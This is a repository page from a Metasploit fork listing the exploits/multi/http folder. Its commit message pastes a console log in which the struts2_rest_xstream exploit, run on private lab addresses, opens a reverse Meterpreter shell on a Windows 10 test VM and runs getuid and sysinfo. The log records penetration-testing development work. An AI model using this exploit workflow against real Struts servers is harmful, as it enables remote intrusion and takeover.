Files
metasploit-gs/modules/exploits/multi/http
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
2018-08-27 20:01:00 -05:00
..
2017-08-28 20:17:58 -04:00
2017-08-29 17:44:39 -05:00
2017-08-28 20:17:58 -04:00
2017-08-28 20:17:58 -04:00
2017-08-28 20:17:58 -04:00
2017-08-28 20:17:58 -04:00
2017-08-28 20:17:58 -04:00
2017-08-28 20:17:58 -04:00
2017-08-28 20:17:58 -04:00
2017-08-28 20:17:58 -04:00
2017-08-28 20:17:58 -04:00
2018-05-07 07:26:28 -05:00
2017-08-28 20:17:58 -04:00
2018-05-16 05:39:17 -05:00
2017-08-28 20:17:58 -04:00
2018-07-30 12:15:59 -05:00
2017-09-08 10:04:47 -05:00
2017-09-07 21:18:50 -04:00